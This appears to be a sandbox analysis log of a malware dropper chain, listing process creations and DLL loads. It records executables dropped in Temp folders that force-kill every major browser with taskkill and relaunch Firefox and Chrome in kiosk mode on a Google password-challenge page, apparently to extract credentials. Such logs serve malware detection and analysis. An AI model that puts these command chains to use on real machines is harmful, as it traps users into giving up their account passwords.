Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2272 -parentBuildID 20230927232528 -prefsHandle 2192 -prefMapHandle 2184 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {55e86b5f-3953-4278-9a52-23c7c331b436} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 2ba49c6e110 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe "C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe "C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4116 -parentBuildID 20230927232528 -prefsHandle 4068 -prefMapHandle 4064 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f1a1788-4a6a-4b44-adb8-7b34c81ea1a2} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 2ba5bd78210 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe "C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe"
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe "C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe"
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1944,i,17281856634279828374,9724014430205040748,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1164 --field-trial-handle=1988,i,16142706175083674967,2684589522950696221,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe "C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe"
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe "C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe "C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe "C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe "C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe"
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2272 -parentBuildID 20230927232528 -prefsHandle 2192 -prefMapHandle 2184 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {55e86b5f-3953-4278-9a52-23c7c331b436} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 2ba49c6e110 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4116 -parentBuildID 20230927232528 -prefsHandle 4068 -prefMapHandle 4064 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f1a1788-4a6a-4b44-adb8-7b34c81ea1a2} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 2ba5bd78210 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1944,i,17281856634279828374,9724014430205040748,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1164 --field-trial-handle=1988,i,16142706175083674967,2684589522950696221,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: mlang.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll
